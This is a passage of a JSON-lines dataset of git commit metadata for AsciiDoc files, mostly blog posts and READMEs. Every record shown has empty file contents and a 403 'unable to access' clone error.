search,markllama\/elasticsearch,diendt\/elasticsearch,lightslife\/elasticsearch,EasonYi\/elasticsearch,henakamaMSFT\/elasticsearch,artnowo\/elasticsearch,sarwarbhuiyan\/elasticsearch,yuy168\/elasticsearch,jbertouch\/elasticsearch,kalburgimanjunath\/elasticsearch,winstonewert\/elasticsearch,Shekharrajak\/elasticsearch,lmtwga\/elasticsearch,sc0ttkclark\/elasticsearch,mikemccand\/elasticsearch,pranavraman\/elasticsearch,EasonYi\/elasticsearch,MichaelLiZhou\/elasticsearch,jprante\/elasticsearch,MjAbuz\/elasticsearch,xuzha\/elasticsearch,schonfeld\/elasticsearch,himanshuag\/elasticsearch,kimimj\/elasticsearch,masterweb121\/elasticsearch,mm0\/elasticsearch,jpountz\/elasticsearch,awislowski\/elasticsearch,xuzha\/elasticsearch,apepper\/elasticsearch,JervyShi\/elasticsearch,mapr\/elasticsearch,s1monw\/elasticsearch,dongjoon-hyun\/elasticsearch,mikemccand\/elasticsearch,andrestc\/elasticsearch,jbertouch\/elasticsearch,dpursehouse\/elasticsearch,awislowski\/elasticsearch,spiegela\/elasticsearch,ricardocerq\/elasticsearch,areek\/elasticsearch,mgalushka\/elasticsearch,polyfractal\/elasticsearch,sposam\/elasticsearch,nrkkalyan\/elastics
earch,Fsero\/elasticsearch,infusionsoft\/elasticsearch,PhaedrusTheGreek\/elasticsearch,ivansun1010\/elasticsearch,MaineC\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,wbowling\/elasticsearch,fekaputra\/elasticsearch,luiseduardohdbackup\/elasticsearch,jango2015\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Fsero\/elasticsearch,vingupta3\/elasticsearch,mmaracic\/elasticsearch,onegambler\/elasticsearch,amit-shar\/elasticsearch,achow\/elasticsearch,rmuir\/elasticsearch,acchen97\/elasticsearch,nomoa\/elasticsearch,mm0\/elasticsearch,mjason3\/elasticsearch,onegambler\/elasticsearch,sarwarbhuiyan\/elasticsearch,rlugojr\/elasticsearch,bawse\/elasticsearch,ckclark\/elasticsearch,maddin2016\/elasticsearch,lydonchandra\/elasticsearch,elancom\/elasticsearch,areek\/elasticsearch,glefloch\/elasticsearch,xingguang2013\/elasticsearch,iamjakob\/elasticsearch,polyfractal\/elasticsearch,yynil\/elasticsearch,beiske\/elasticsearch,himanshuag\/elasticsearch,Shepard1212\/elasticsearch,liweinan0423\/elasticsearch,wbowling\/elasticsearch,yongminxia\/elasticsearch,andrestc\/elasticsearch,yongminxia\/elasticsearch,LeoYao\/elasticsearch,yanjunh\/elasticsearch,tebriel\/elasticsearch,rento19962\/elasticsearch,camilojd\/elasticsearch,mjason3\/elasticsearch,nellicus\/elasticsearch,andrejserafim\/elasticsearch,xingguang2013\/elasticsearch,Rygbee\/elasticsearch,sdauletau\/elasticsearch,hafkensite\/elasticsearch,mortonsykes\/elasticsearch,iantruslove\/elasticsearch,myelin\/elasticsearch,wenpos\/elasticsearch,kunallimaye\/elasticsearch,Rygbee\/elasticsearch,rmuir\/elasticsearch,alexshadow007\/elasticsearch,jchampion\/elasticsearch,amit-shar\/elasticsearch,jpountz\/elasticsearch,HarishAtGitHub\/elasticsearch,andrestc\/elasticsearch,cnfire\/elasticsearch-1,sarwarbhuiyan\/elasticsearch,Helen-Zhao\/elasticsearch,rhoml\/elasticsearch,iamjakob\/elasticsearch,xuzha\/elasticsearch,djschny\/elasticsearch,trangvh\/elasticsearch,strapdata\/elassandra,ouyangkongtong\/elasticsearch,gmarz\/elasticsearch,dylan8902\/elasticsearch,yuy168\/elasticsearch,martinstuga\/elasticsearch,fernandozhu\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,zeroctu\/elasticsearch,acchen97\/elasticsearch,iantruslove\/elasticsearch,liweinan0423\/elasticsearch,Liziyao\/elasticsearch,gfyoung\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,shreejay\/elasticsearch,hirdesh2008\/elasticsearch,C-Bish\/elasticsearch,martinstuga\/elasticsearch,strapdata\/elassandra5-rc,djschny\/elasticsearch,scorpionvicky\/elasticsearch,mikemccand\/elasticsearch,xuzha\/elasticsearch,markharwood\/elasticsearch,clintongormley\/elasticsearch,MaineC\/elasticsearch,Fsero\/elasticsearch,vingupta3\/elasticsearch,iacdingping\/elasticsearch,dataduke\/elasticsearch,markharwood\/elasticsearch,drewr\/elasticsearch,tkssharma\/elasticsearch,drewr\/elasticsearch,markwalkom\/elasticsearch,scorpionvicky\/elasticsearch,truemped\/elasticsearch,masterweb121\/elasticsearch,mm0\/elasticsearch,vroyer\/elasticassandra,mgalushka\/elasticsearch,zeroctu\/elasticsearch,markharwood\/elasticsearch,nellicus\/elasticsearch,markllama\/elasticsearch,Siddartha07\/elasticsearch,huanzhong\/elasticsearch,scorpionvicky\/elasticsearch,bestwpw\/elasticsearch,slavau\/elasticsearch,awislowski\/elasticsearch,iamjakob\/elasticsearch,diendt\/elasticsearch,cnfire\/elasticsearch-1,tkssharma\/elasticsearch,humandb\/elasticsearch,ImpressTV\/elasticsearch,kubum\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,jimczi\/elasticsearch,TonyChai24\/ESSource,sda
uletau\/elasticsearch,acchen97\/elasticsearch,18098924759\/elasticsearch,obourgain\/elasticsearch,kevinkluge\/elasticsearch,snikch\/elasticsearch,NBSW\/elasticsearch,mapr\/elasticsearch,mjhennig\/elasticsearch,hirdesh2008\/elasticsearch,slavau\/elasticsearch,JervyShi\/elasticsearch,qwerty4030\/elasticsearch,lmtwga\/elasticsearch,yongminxia\/elasticsearch,springning\/elasticsearch,huanzhong\/elasticsearch,girirajsharma\/elasticsearch,mnylen\/elasticsearch,mmaracic\/elasticsearch,ImpressTV\/elasticsearch,robin13\/elasticsearch,iantruslove\/elasticsearch,snikch\/elasticsearch,lightslife\/elasticsearch,IanvsPoplicola\/elasticsearch,glefloch\/elasticsearch,AndreKR\/elasticsearch,rento19962\/elasticsearch,Fsero\/elasticsearch,kalimatas\/elasticsearch,Shekharrajak\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,springning\/elasticsearch,djschny\/elasticsearch,naveenhooda2000\/elasticsearch,Widen\/elasticsearch,sposam\/elasticsearch,ImpressTV\/elasticsearch,djschny\/elasticsearch,areek\/elasticsearch,markllama\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,lmtwga\/elasticsearch,HarishAtGitHub\/elasticsearch,areek\/elasticsearch,sreeramjayan\/elasticsearch,HonzaKral\/elasticsearch,iamjakob\/elasticsearch,lzo\/elasticsearch-1,umeshdangat\/elasticsearch,kevinkluge\/elasticsearch,nazarewk\/elasticsearch,yuy168\/elasticsearch,btiernay\/elasticsearch,palecur\/elasticsearch,queirozfcom\/elasticsearch,jeteve\/elasticsearch,ulkas\/elasticsearch,kubum\/elasticsearch,ivansun1010\/elasticsearch,yynil\/elasticsearch,hafkensite\/elasticsearch,mjhennig\/elasticsearch,i-am-Nathan\/elasticsearch,areek\/elasticsearch,markwalkom\/elasticsearch,18098924759\/elasticsearch,davidvgalbraith\/elasticsearch,rajanm\/elasticsearch,achow\/elasticsearch,TonyChai24\/ESSource,nazarewk\/elasticsearch,linglaiyao1314\/elasticsearch,EasonYi\/elasticsearch,camilojd\/elasticsearch,humandb\/elasticsearch,drewr\/elasticsearch,jpountz\/elasticsearch,xingguang2013\/elasticsearch,martinstuga\/elasticsearch,F0lha\/elasticsearch,mute\/elasticsearch,kingaj\/elasticsearch,umeshdangat\/elasticsearch,mjhennig\/elasticsearch,dongjoon-hyun\/elasticsearch,jeteve\/elasticsearch,uschindler\/elasticsearch,schonfeld\/elasticsearch,linglaiyao1314\/elasticsearch,amit-shar\/elasticsearch,martinstuga\/elasticsearch,Chhunlong\/elasticsearch,clintongormley\/elasticsearch,hanswang\/elasticsearch,adrianbk\/elasticsearch,sreeramjayan\/elasticsearch,rento19962\/elasticsearch,abibell\/elasticsearch,coding0011\/elasticsearch,cwurm\/elasticsearch,i-am-Nathan\/elasticsearch,markharwood\/elasticsearch,jprante\/elasticsearch,likaiwalkman\/elasticsearch,lightslife\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,Ansh90\/elasticsearch,girirajsharma\/elasticsearch,dongjoon-hyun\/elasticsearch,avikurapati\/elasticsearch,kaneshin\/elasticsearch,wayeast\/elasticsearch,jango2015\/elasticsearch,scottsom\/elasticsearch,jprante\/elasticsearch,AndreKR\/elasticsearch,apepper\/elasticsearch,sc0ttkclark\/elasticsearch,gingerwizard\/elasticsearch,fekaputra\/elasticsearch,GlenRSmith\/elasticsearch,kenshin233\/elasticsearch,jpountz\/elasticsearch,elasticdog\/elasticsearch,F0lha\/elasticsearch,rlugojr\/elasticsearch,truemped\/elasticsearch,masterweb121\/elasticsearch,coding0011\/elasticsearch,zeroctu\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,diendt\/elasticsearch,rento19962\/elasticsearch,mm0\/elasticsearch,HarishAtGitHub\/elasticsearch,tsohil\/elasticsearch,huanzhong\/elasticsearch,JackyMai\/elasticsearch,jango2015\/elasticsearch,mgalushka\/
elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,hydro2k\/elasticsearch,coding0011\/elasticsearch,mmaracic\/elasticsearch,a2lin\/elasticsearch,myelin\/elasticsearch,ImpressTV\/elasticsearch,palecur\/elasticsearch,MetSystem\/elasticsearch,kingaj\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Brijeshrpatel9\/elasticsearch,caengcjd\/elasticsearch,Helen-Zhao\/elasticsearch,brandonkearby\/elasticsearch,ZTE-PaaS\/elasticsearch,luiseduardohdbackup\/elasticsearch,pritishppai\/elasticsearch,fernandozhu\/elasticsearch,queirozfcom\/elasticsearch,MetSystem\/elasticsearch,socialrank\/elasticsearch,nazarewk\/elasticsearch,ouyangkongtong\/elasticsearch,Shepard1212\/elasticsearch,Helen-Zhao\/elasticsearch,springning\/elasticsearch,ivansun1010\/elasticsearch,MjAbuz\/elasticsearch,mjhennig\/elasticsearch,MisterAndersen\/elasticsearch,KimTaehee\/elasticsearch,jango2015\/elasticsearch,rmuir\/elasticsearch,apepper\/elasticsearch,Siddartha07\/elasticsearch,masaruh\/elasticsearch,palecur\/elasticsearch,Siddartha07\/elasticsearch,andrestc\/elasticsearch,Liziyao\/elasticsearch,jimhooker2002\/elasticsearch,markwalkom\/elasticsearch,coding0011\/elasticsearch,episerver\/elasticsearch,strapdata\/elassandra5-rc,slavau\/elasticsearch,weipinghe\/elasticsearch,Charlesdong\/elasticsearch,masterweb121\/elasticsearch,tkssharma\/elasticsearch,weipinghe\/elasticsearch,nellicus\/elasticsearch,schonfeld\/elasticsearch,apepper\/elasticsearch,fred84\/elasticsearch,clintongormley\/elasticsearch,socialrank\/elasticsearch,yynil\/elasticsearch,infusionsoft\/elasticsearch,lchennup\/elasticsearch,abibell\/elasticsearch,brandonkearby\/elasticsearch,pablocastro\/elasticsearch,karthikjaps\/elasticsearch,caengcjd\/elasticsearch,hirdesh2008\/elasticsearch,NBSW\/elasticsearch,MichaelLiZhou\/elasticsearch,rajanm\/elasticsearch,clintongormley\/elasticsearch,cnfire\/elasticsearch-1,nellicus\/elasticsearch,palecur\/elasticsearch,nrkkalyan\/elasticsearch,KimTaehee\/elasticsearch,amit-shar\/elasticsearch,GlenRSmith\/elasticsearch,i-am-Nathan\/elasticsearch,sarwarbhuiyan\/elasticsearch,IanvsPoplicola\/elasticsearch,pozhidaevak\/elasticsearch,JackyMai\/elasticsearch,mm0\/elasticsearch,Brijeshrpatel9\/elasticsearch,henakamaMSFT\/elasticsearch,knight1128\/elasticsearch,zkidkid\/elasticsearch,F0lha\/elasticsearch,humandb\/elasticsearch,Uiho\/elasticsearch,IanvsPoplicola\/elasticsearch,pablocastro\/elasticsearch,hydro2k\/elasticsearch,HarishAtGitHub\/elasticsearch,dpursehouse\/elasticsearch,KimTaehee\/elasticsearch,masaruh\/elasticsearch,Brijeshrpatel9\/elasticsearch,njlawton\/elasticsearch,wbowling\/elasticsearch,wittyameta\/elasticsearch,queirozfcom\/elasticsearch,MichaelLiZhou\/elasticsearch,jbertouch\/elasticsearch,Stacey-Gammon\/elasticsearch,springning\/elasticsearch,iacdingping\/elasticsearch,C-Bish\/elasticsearch,knight1128\/elasticsearch,Widen\/elasticsearch,lchennup\/elasticsearch,kcompher\/elasticsearch,Liziyao\/elasticsearch,springning\/elasticsearch,Brijeshrpatel9\/elasticsearch,mjason3\/elasticsearch,Fsero\/elasticsearch,wbowling\/elasticsearch,mbrukman\/elasticsearch,apepper\/elasticsearch,kaneshin\/elasticsearch,markllama\/elasticsearch,vingupta3\/elasticsearch,uschindler\/elasticsearch,dpursehouse\/elasticsearch,Stacey-Gammon\/elasticsearch,AndreKR\/elasticsearch,strapdata\/elassandra5-rc,strapdata\/elassandra-test,rlugojr\/elasticsearch,IanvsPoplicola\/elasticsearch,shreejay\/elasticsearch,franklanganke\/elasticsearch,geidies\/elasticsearch,Siddartha07\/elasticsearch,petabytedata\/elasticsearch,wenpos\/elasticsearch,kubu
m\/elasticsearch,avikurapati\/elasticsearch,nezirus\/elasticsearch,abibell\/elasticsearch,mcku\/elasticsearch,kaneshin\/elasticsearch,AndreKR\/elasticsearch,EasonYi\/elasticsearch,caengcjd\/elasticsearch,cnfire\/elasticsearch-1,dataduke\/elasticsearch,nazarewk\/elasticsearch,maddin2016\/elasticsearch,wittyameta\/elasticsearch,myelin\/elasticsearch,davidvgalbraith\/elasticsearch,Collaborne\/elasticsearch,JSCooke\/elasticsearch,nrkkalyan\/elasticsearch,tsohil\/elasticsearch,i-am-Nathan\/elasticsearch,ckclark\/elasticsearch,kalburgimanjunath\/elasticsearch,polyfractal\/elasticsearch,rhoml\/elasticsearch,yanjunh\/elasticsearch,mcku\/elasticsearch,ulkas\/elasticsearch,vietlq\/elasticsearch,PhaedrusTheGreek\/elasticsearch,hirdesh2008\/elasticsearch,lzo\/elasticsearch-1,knight1128\/elasticsearch,jchampion\/elasticsearch,YosuaMichael\/elasticsearch,mohit\/elasticsearch,wangtuo\/elasticsearch,polyfractal\/elasticsearch,ZTE-PaaS\/elasticsearch","old_file":"docs\/reference\/mapping\/types.asciidoc","new_file":"docs\/reference\/mapping\/types.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5040dde85808e7eb8d2513f817e25d19de60c9f6","subject":"samples - add a playground file to test new features","message":"samples - add a playground file to test new features\n","repos":"joaompinto\/asciidoctor-vscode,joaompinto\/asciidoctor-vscode,joaompinto\/asciidoctor-vscode","old_file":"test\/samples\/playground.adoc","new_file":"test\/samples\/playground.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joaompinto\/asciidoctor-vscode.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ceb56939e278b21fd340dea6fa1e04a9d2b15fc","subject":"y2b create post Samsung Galaxy S4 Event LIVE COVERAGE! (Galaxy S IV)","message":"y2b create post Samsung Galaxy S4 Event LIVE COVERAGE! 
(Galaxy S IV)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-14-Samsung-Galaxy-S4-Event-LIVE-COVERAGE-Galaxy-S-IV.adoc","new_file":"_posts\/2013-03-14-Samsung-Galaxy-S4-Event-LIVE-COVERAGE-Galaxy-S-IV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"393939a4d6bf52a51bfb69b09d503fed7dbe83eb","subject":"Update 2015-09-25-title.adoc","message":"Update 2015-09-25-title.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-title.adoc","new_file":"_posts\/2015-09-25-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edf12d83c181e3bdacec53a8a23e4305b26cc255","subject":"Update 2015-07-16-Test-blog-post.adoc","message":"Update 2015-07-16-Test-blog-post.adoc","repos":"wayr\/wayr.github.io,wayr\/wayr.github.io,wayr\/wayr.github.io,wayr\/wayr.github.io","old_file":"_posts\/2015-07-16-Test-blog-post.adoc","new_file":"_posts\/2015-07-16-Test-blog-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wayr\/wayr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2083df5aa4712814e56828d371bbc55634107adc","subject":"y2b create post Does It Suck? - $60 Android Phone","message":"y2b create post Does It Suck? - $60 Android Phone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-19-Does-It-Suck--60-Android-Phone.adoc","new_file":"_posts\/2015-07-19-Does-It-Suck--60-Android-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd96ea6e4f8dd6bebd7e43f1e030abbdcbe525ca","subject":"y2b create post This Gadget Plays The Classics","message":"y2b create post This Gadget Plays The Classics","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-25-This-Gadget-Plays-The-Classics.adoc","new_file":"_posts\/2016-07-25-This-Gadget-Plays-The-Classics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63e7246a8c211f10ec8482a9dad73794ff1a36b4","subject":"Update 2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","message":"Update 2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_file":"_posts\/2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53ea935531902e3153311c16478e970789e623bf","subject":"y2b create post Sharp Intros World's First 8K TV at CES 2012","message":"y2b create post Sharp Intros World's First 8K TV at CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-11-Sharp-Intros-Worlds-First-8K-TV-at-CES-2012.adoc","new_file":"_posts\/2012-01-11-Sharp-Intros-Worlds-First-8K-TV-at-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfd9ecd7eed813be2b6c7832c00729aea2ff984c","subject":"Create common-installingGrails-grails3.adoc","message":"Create common-installingGrails-grails3.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-installingGrails-grails3.adoc","new_file":"src\/main\/docs\/common-installingGrails-grails3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8350c3b4d4623b8c42368761f90c40915fcfbd2e","subject":"Update 2015-08-17-Council-and-Government-Website-Development.adoc","message":"Update 2015-08-17-Council-and-Government-Website-Development.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-08-17-Council-and-Government-Website-Development.adoc","new_file":"_posts\/2015-08-17-Council-and-Government-Website-Development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b919fe92cd4e5bdf127886772c97a6f49ef53402","subject":"Update 2015-12-29-Start-react-with-redux.adoc","message":"Update 2015-12-29-Start-react-with-redux.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-12-29-Start-react-with-redux.adoc","new_file":"_posts\/2015-12-29-Start-react-with-redux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b507cd001e2a1108f7b613978a0df1be934f8b1a","subject":"Update 2016-03-29-Zonas-de-transferencia.adoc","message":"Update 2016-03-29-Zonas-de-transferencia.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f45800d3ca224a9e8f457e5c27274bc9578dcb6","subject":"Update 2015-05-17-Erstellt-euren-eigenen-Gert.adoc","message":"Update 
2015-05-17-Erstellt-euren-eigenen-Gert.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Erstellt-euren-eigenen-Gert.adoc","new_file":"_posts\/2015-05-17-Erstellt-euren-eigenen-Gert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e7a3f9583412b1f811b223302ecd66a7d442719","subject":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","message":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b402e5955c599a82f1a63680c10f6e641c8ca2e","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"487a7ecec3de0f80e43baf304488c602e752d689","subject":"y2b create post The $1700 Real Gold iPhone 7","message":"y2b create post The $1700 Real Gold iPhone 7","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-15-The-1700-Real-Gold-iPhone-7.adoc","new_file":"_posts\/2017-04-15-The-1700-Real-Gold-iPhone-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2153c240fb627a3bb684f567860bbdd68bd14da4","subject":"Update 2017-11-30-Episode-119-Gaps-in-Storage.adoc","message":"Update 2017-11-30-Episode-119-Gaps-in-Storage.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-11-30-Episode-119-Gaps-in-Storage.adoc","new_file":"_posts\/2017-11-30-Episode-119-Gaps-in-Storage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a04423b34c7fff736530823f4415966a51969699","subject":"Trapping Ctrl-C","message":"Trapping 
Ctrl-C\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b8b9a78149b46fc4f5e965d5755e31997d2bcfcc","subject":"README added","message":"README added\n","repos":"mojavelinux\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,NicolasGeraud\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NicolasGeraud\/asciidoctor-maven-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9f3f31ae2ee26b62f5a553ab9aaba97b8325c024","subject":"Add the \"building kudu\" section back (deleted in change 1175)","message":"Add the \"building kudu\" section back (deleted in change 1175)\n\nChange-Id: Iaf5e548cba957ef143d95b1bc75008fc237a557b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1180\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9abb3a1b08be534f33c2bbe8b9a030fafc7e997d","subject":"feat(doc): move to asciidoc","message":"feat(doc): move to asciidoc\n","repos":"gravitee-io\/gravitee-policy-mock","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-mock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5b5753872dd42c4a3a16ed9d363985d4116c99c","subject":"Polish up file references","message":"Polish up file references\n","repos":"wangcan2014\/tut-bookmarks,Sheparzo\/tut-bookmarks,razordaze\/tut-bookmarks,DongsunPark\/bookmarks","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DongsunPark\/bookmarks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
